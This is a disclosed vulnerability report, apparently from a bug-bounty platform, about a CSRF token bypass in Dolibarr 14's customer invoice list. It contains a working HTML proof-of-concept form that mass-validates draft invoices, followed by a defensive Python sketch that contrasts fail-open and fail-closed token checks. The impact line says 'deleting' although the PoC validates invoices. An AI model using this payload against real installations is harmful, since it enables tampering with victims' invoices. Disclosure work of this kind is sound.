Cross-Site Request Forgery (CSRF) in dolibarr/dolibarr

Valid

Reported on

Jul 21st 2021


✍️ Description

In the Billing | Payment section, in the Customer invoices part, you protect invoice statuses from any kind of modification by CSRF attacks, but if I set the CSRF token to nothing then I am able to modify arbitrary invoice statuses only by knowing their ids.

In this PoC.html I am able to validate any draft invoices only by knowing the value of the "toselect" parameter.

🕵️‍♂️ Proof of Concept

// PoC.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://demo.dolibarr.org/compta/facture/list.php" method="POST">
      <input type="hidden" name="token" value="" />
      <input type="hidden" name="formfilteraction" value="list" />
      <input type="hidden" name="action" value="list" />
      <input type="hidden" name="sortfield" value="f&#46;fk&#95;statut&#44;f&#46;paye&#44;f&#46;type&#44;dynamount&#95;payed" />
      <input type="hidden" name="sortorder" value="desc&#44;desc&#44;desc&#44;desc" />
      <input type="hidden" name="search&#95;status" value="0" />
      <input type="hidden" name="contextpage" value="invoicelist" />
      <input type="hidden" name="massaction" value="validate" />
      <input type="hidden" name="confirmmassaction" value="Confirm" />
      <input type="hidden" name="pageplusoneold" value="1" />
      <input type="hidden" name="limit" value="25" />
      <input type="hidden" name="pageplusone" value="1" />
      <input type="hidden" name="search&#95;sale" value="&#45;1" />
      <input type="hidden" name="search&#95;user" value="&#45;1" />
      <input type="hidden" name="search&#95;product&#95;category" value="&#45;1" />
      <input type="hidden" name="search&#95;categ&#95;cus" value="&#45;1" />
      <input type="hidden" name="search&#95;ref" value="" />
      <input type="hidden" name="search&#95;company" value="" />
      <input type="hidden" name="search&#95;paymentmode" value="" />
      <input type="hidden" name="search&#95;montant&#95;ht" value="" />
      <input type="hidden" name="search&#95;montant&#95;ttc" value="" />
      <input type="hidden" name="search&#95;multicurrency&#95;montant&#95;vat" value="" />
      <input type="hidden" name="search&#95;status" value="0" />
      <input type="hidden" name="selectedfields" value="f&#46;ref&#44;s&#46;nom&#44;f&#46;total&#95;ht&#44;f&#46;total&#95;ttc&#44;dynamount&#95;payed&#44;rtp&#44;f&#46;multicurrency&#95;total&#95;vat&#44;f&#46;fk&#95;mode&#95;reglement&#44;f&#46;fk&#95;statut&#44;" />
      <input type="hidden" name="toselect&#91;&#93;" value="7890" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

💥 Impact

This vulnerability is capable of deleting the mentioned invoices. Version of application == 14 (tested on demo website)
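The bypass above works because an empty token is treated as "no token to check" rather than "invalid token". The following is an added illustration (not Dolibarr's code) contrasting that fail-open pattern with a fail-closed check on requests shaped like the PoC form; the session token, the request dicts and the rule that any non-empty massaction is state-changing are constructed assumptions.

```python
import hmac
import secrets

# Constructed stand-in for the server session: the anti-CSRF token that was
# issued to the logged-in user when the invoice list page was rendered.
SESSION_TOKEN = secrets.token_hex(16)


def is_state_changing(form: dict) -> bool:
    """Assumption for this example: a list.php request mutates data once a
    mass action is selected; filtering/sorting alone is read-only."""
    return bool(form.get("massaction"))


def weak_check(form: dict, session_token: str) -> bool:
    """Fail-open pattern: the token is only compared when one was sent, so a
    request carrying token="" (as in the PoC above) is never rejected."""
    token = form.get("token", "")
    if token and token != session_token:
        return False
    return True


def strict_check(form: dict, session_token: str) -> bool:
    """Fail-closed pattern: every state-changing request must carry a
    non-empty token equal to the session's, compared in constant time."""
    if not is_state_changing(form):
        return True
    token = form.get("token") or ""
    return bool(token) and hmac.compare_digest(token, session_token)


# Constructed requests mirroring the PoC form (parameter names from the report).
FORGED = {"token": "", "action": "list", "massaction": "validate",
          "confirmmassaction": "Confirm", "toselect[]": ["7890"]}
LEGIT = dict(FORGED, token=SESSION_TOKEN)          # same action, genuine token
READ_ONLY = {"token": "", "action": "list", "search_status": "0"}


def outcomes() -> dict:
    """(weak, strict) accept/reject decision for each sample request."""
    return {
        name: (weak_check(f, SESSION_TOKEN), strict_check(f, SESSION_TOKEN))
        for name, f in (("forged", FORGED), ("legit", LEGIT), ("read_only", READ_ONLY))
    }


if __name__ == "__main__":
    for name, (weak, strict) in outcomes().items():
        print(f"{name:9s} weak={'accept' if weak else 'reject'} "
              f"strict={'accept' if strict else 'reject'}")
```

Only the forged request separates the two checks: the weak variant accepts it, the strict one rejects it, while the legitimate and read-only requests pass both.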

We have contacted a member of the dolibarr team and are waiting to hear back 4 months ago
Laurent Destailleur confirmed that a fix has been merged on 89e8f2 3 months ago
Laurent Destailleur has been awarded the fix bounty